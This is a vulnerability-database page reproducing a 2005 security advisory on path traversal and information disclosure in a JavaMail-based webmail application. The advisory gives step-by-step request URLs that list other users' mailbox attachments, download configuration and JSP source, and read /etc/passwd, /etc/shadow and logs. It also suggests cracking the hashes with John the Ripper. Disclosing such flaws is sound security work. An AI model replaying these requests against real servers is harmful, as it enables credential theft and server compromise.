Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

javamailAPI.txt

🗓️ 14 Aug 2005 00:00:00Reported by Thet Aung Min LattType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 17 Views

Javamail API Multiple Information Disclosure Vulnerabilities. Attacker can access mailbox attachments, download configuration information and compromise root/admin on target machines

Code
`  
  
Javamail Multiple Information Disclosure Vulnerabilities  
  
May 25, 2005 Yangon, Myanmar.  
  
Vulnerable Systems:  
* JavaMail API 1.3  
* JavaMail API 1.2  
* JavaMail API 1.1.3  
  
Tested on Apache Tomcat/5.0.16  
Possibly on all versions of Windows  
  
Failed to restrict to accessing other directory and files in ReadMessage.jsp  
  
File Name:<%=mp.getFileName()%><br>  
Type: <%=abc.getContent_Type()%><br>  
Size: <%=abc.getMsgSize()/1024%>Kb<br><a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + abc.getFileName() %>" target="_new"> download </a><br>  
  
<%=abc.getFilePath() + "/" + abc.getFileName() %>"  
  
It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName()  
  
1. Open specific mailbox attachment  
2. Download .jsp source code and configuration information of javamail  
3. Target machine Root/Admin Compromise  
4. Download server information  
  
1. Open specific mailbox attachment  
  
When user download message from Javamail domain from webmail, attacker may notice URL   
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/[email protected]/messageid123@user/filename.extension  
  
Then noticed URL lead to /var/folders so tried to switched folders.  
  
http://example.com/var/serviceprovider/web/mailboxesdir/[email protected]/messageid123@user  
  
But got errors. So finally when reached to this URL  
  
http://example.com/mailboxesdir/[email protected]/  
  
It’s made listing of [email protected] attachments are there.   
  
Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to get attachments listing.   
  
http://example.com/mailboxesdir/[email protected]/  
  
http://example.com/mailboxesdir/[email protected]/  
  
  
2. Download configuration information of javamail  
  
And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually web browser got the redirect name   
  
http://example.com/Download?/var/serviceprovider/web/mailboxesdir/[email protected]/messageid123@user/filename.extension  
  
This information lead to get web.xml  
  
http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml  
  
  
Which give configuration information of javamail  
  
Download source code of jsp file  
http://example.com/Download?/var/serviceprovider/web/login.jsp  
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp  
http://example.com/Download?/var/serviceprovider/web/addbook.jsp  
http://example.com/Download?/var/serviceprovider/web/compose.jsp  
http://example.com/Download?/var/serviceprovider/web/folder.jsp  
  
  
  
  
3. Target machine Root/Admin Compromise  
  
In UNIX /etc/passwd and /etc/shadow are important folder which   
  
A little bit curious and look in web browser typing that   
http://example.com/Download?/etc/passwd  
  
example of such a password file is:  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
  
Then Crack Unix password files with John the Ripper.  
  
John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'.   
  
http://example.com/Download?/etc/shadow  
  
root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::  
adm:*:133334:0:22222:7:::  
ftp:*:133334:0:2222:7:::  
  
http://example.com/Download?/etc/group  
/etc/group file:  
  
root:x:0:  
daemon:x:1:  
bin:x:2:  
sys:x:3:  
adm:x:4:  
tty:x:5:  
disk:x:6:  
lp:x:7:lp  
mail:x:8:  
news:x:9:  
uucp:x:10:  
proxy:x:13:  
  
  
When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker may do Website defacement, database altering, stealing and more.  
  
4. Download server information  
  
http://example.com/Download?/var/log/boot.log  
http://example.com/Download?/var/log/maillog  
And more can be done .  
  
By   
Thet Aung Min Latt [email protected]  
http://thetaung.amyanmar.com  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
14 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4
javamail vulnerabilityinformation disclosuremailbox accessconfiguration downloadroot compromiseadmin compromiseunix password file
17